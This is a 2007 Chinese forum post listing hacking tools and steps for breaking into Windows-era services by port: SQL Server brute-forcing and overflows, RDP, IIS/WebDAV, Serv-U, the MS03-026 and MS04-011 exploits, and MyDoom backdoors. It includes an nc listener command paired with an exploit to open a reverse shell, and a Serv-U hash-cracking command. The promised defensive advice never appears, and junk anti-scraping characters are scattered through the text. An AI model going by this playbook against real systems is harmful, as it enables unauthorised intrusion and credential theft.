 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 ( p4 O. a$ S1 W7 ~9 Q8 Z
3 |! G% y6 J! w$ C0 i" _- D# w
, K O. ^$ K3 s9 I 1. 1433端口入侵 & o: n/ w% w4 B4 @ e4 b$ i0 C
$ X- M4 s# ^7 q9 ^
scanport.exe 查有1433的机器
* p; s6 N' h4 N) G/ U# c7 p' u4 R }+ S. x0 S' m9 P
SQLScanPass.exe 进行字典暴破(字典是关键) 5 S. i% @* F' g! e5 }
! C+ K( A: y9 \( R
最后 SQLTools.exe入侵 " w- a& q& G0 N) j" u, d
& z2 l; e: e; c( k( B9 |5 O# w ============================= ; w3 r- `" |0 A6 ~. \0 z
. H( c2 {5 M# B6 f% U6 a; |, Z 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 / l; ?1 J* e; p- R3 G
8 k; j$ q( |, |. T
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 1 R7 y/ H" q& q8 v
& J: \ n( F; ^: x" E: x
(以上反向的,测试成功) 1 h: y. J8 G( |" @
& b* W7 i2 k. E- E. |5 ]4 _
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
% S4 O& V+ A- I& |9 A( N % u' v" k: |$ A5 ]- F, l9 Y7 v
2. 4899端口入侵
, s( F) y0 Z: w- w. T: S* V& \3 i( g2 [3 ?- {7 g: O/ f: r
用4899过滤器.exe,扫描空口令的机器
L/ A/ ? n9 m: B8 p0 N6 |! P
3 X, M$ R) A A# Y5 r5 i5 K/ V+ A 3. 3899的入侵
8 ^. F; N+ c7 r! z+ @8 T5 m# c( a. E1 I' b
对很早的机器,可以试试3389的溢出(win3389ex.exe) , D4 k+ F' T3 K8 e: R
. D4 v) u% V3 h$ n0 e0 Y2 k8 U5 Q 对2000的机器,可以试试字典暴破。(tscrack.exe)
; M7 h" ?+ e) h7 `+ k" f& c5 a2 w
: L$ Q! A9 w8 h5 Z; b0 | 4. 80入侵 [: Z- ~/ p' H: A* b% [' A
Z3 ?" n! A$ ?! K' G1 M 对sp3以前的机器,可以用webdav入侵;
$ Z4 T, x t& u1 t) w
: m/ ~( b/ Z5 T/ H7 ^/ k 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
5 L7 v9 M _; j+ A8 Z& r' y1 b8 X) h6 E9 ~% p6 V
可以利用SQL进行注入。(小榕的注入软件)。
% {& n1 T. U0 |
; H, Q4 y+ E' n4 C7 f5 g* o$ c 5. serv-u入侵(21端口) 4 P( _: [6 I* n6 V" N
; o# Q/ K t" e( j) L+ J3 f" Y [
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) * e. g* u. B9 W& y# Q$ ^5 \
) c: K9 ]- y' v, b( L
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) ! q6 T/ y- A3 B0 P& ]! Q; @
4 ^" V8 L- @7 C( a6 {9 E3 \. @
====================================== 9 ?9 ^) J6 R8 D& n, z8 h' n
" `9 `3 i3 `4 k. O J% e" D* [ 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
0 w* S" G! s* z, |1 v. I9 \$ g" F& z
5 E! @ H; `, m/ N; M( d 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
* p5 _. ~! J; f: {% h! q+ y
/ f0 v- a6 l0 L1 S 6. 554端口
! `1 v$ Z# V* J6 o& F+ f
6 V$ L; a: X, ]$ ]/ { 用real554.exe入侵。 , X2 S6 x, U8 y" Y$ ^* H
; k2 o+ y4 ^' z- Z" ~, p
7. 6129端口
" e# Y/ K0 ]' Q. z3 D3 j4 y( U, K
& V( J$ R: M( {# d 用DameWare6129.exe入侵。
, ~4 E# r, Q8 f- D: k* L6 I
- y/ A& o+ s3 |3 N S* [/ m/ h 8. 系统漏洞
; s) e2 o5 o% ^# b: H; G- p/ n7 f5 \: |
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
5 J" ^- I; ^" z- t3 m- j5 Q
9 W. O N8 \ z3 u 进行溢出入侵。
) f W& ^5 e% @0 U, h n, r( M& D8 I/ X8 p, b! s4 f
9. 3127等端口
5 E. t' K# \! {& K
% Z8 Y8 i; h1 Z 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
( y9 i$ J0 ^+ Y
$ z- A4 C+ U' j0 B' P+ o: G 10. 其他入侵 0 c3 @5 z( C$ I z5 ~
( K3 {4 |7 e! m( I# B! ~
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。5 q P ~0 Q. S9 Q6 A8 c
e# ?5 v6 N( E6 t j h* I; |: B
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
